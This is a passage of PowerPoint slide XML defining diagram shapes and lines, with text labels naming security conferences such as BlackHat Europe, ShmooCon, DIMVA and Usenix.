                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3252" y="1220"/>
                <a:ext cx="242" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36000" name="Rectangle 534"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3252" y="1220"/>
                <a:ext cx="242" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36001" name="Line 535"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="2937" y="1302"/>
                <a:ext cx="436" cy="669"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36002" name="Rectangle 536"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3313" y="1226"/>
                <a:ext cx="166" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>CCC</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36003" name="Rectangle 537"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2141" y="1667"/>
                <a:ext cx="545" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36004" name="Rectangle 538"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2141" y="1667"/>
                <a:ext cx="545" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36005" name="Line 539"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="2414" y="1750"/>
                <a:ext cx="416" cy="225"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36006" name="Rectangle 540"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2202" y="1674"/>
                <a:ext cx="513" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>BlackHat Europe</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36007" name="Rectangle 541"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1939" y="1969"/>
                <a:ext cx="444" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36008" name="Rectangle 542"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1939" y="1969"/>
                <a:ext cx="444" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36009" name="Line 543"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="1519" y="2052"/>
                <a:ext cx="642" cy="220"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36010" name="Rectangle 544"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2020" y="1972"/>
                <a:ext cx="353" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>ShmooCon</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36011" name="Rectangle 545"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="681" y="3130"/>
                <a:ext cx="759" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36012" name="Rectangle 546"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="681" y="3130"/>
                <a:ext cx="759" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36013" name="Line 547"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="1060" y="2585"/>
                <a:ext cx="102" cy="545"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36014" name="Rectangle 548"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="754" y="3135"/>
                <a:ext cx="716" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Congreso De Seguridad</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36015" name="Rectangle 549"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2495" y="1268"/>
                <a:ext cx="343" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36016" name="Rectangle 550"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2495" y="1268"/>
                <a:ext cx="343" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36017" name="Line 551"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="2666" y="1351"/>
                <a:ext cx="271" cy="620"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36018" name="Rectangle 552"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2576" y="1274"/>
                <a:ext cx="230" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>DIMVA</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36019" name="Rectangle 553"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2387" y="1415"/>
                <a:ext cx="461" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36020" name="Rectangle 554"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2387" y="1415"/>
                <a:ext cx="461" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36021" name="Line 555"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="2618" y="1498"/>
                <a:ext cx="212" cy="477"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36022" name="Rectangle 556"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2437" y="1418"/>
                <a:ext cx="444" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>What the hack</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36023" name="Rectangle 557"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="77" y="2223"/>
                <a:ext cx="339" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36024" name="Rectangle 558"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="77" y="2223"/>
                <a:ext cx="339" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36025" name="Line 559"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="246" y="2032"/>
                <a:ext cx="530" cy="191"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36026" name="Rectangle 560"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="160" y="2228"/>
                <a:ext cx="219" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Usenix</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36027" name="Rectangle 561"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="71" y="2072"/>
                <a:ext cx="351" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36028" name="Rectangle 562"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="71" y="2072"/>
                <a:ext cx="351" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36029" name="Line 563"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="246" y="2032"/>
                <a:ext cx="530" cy="40"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36030" name="Rectangle 564"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="155" y="2079"/>
                <a:ext cx="235" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>HotSec</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36031" name="Rectangle 565"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="240" y="1873"/>
                <a:ext cx="352" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
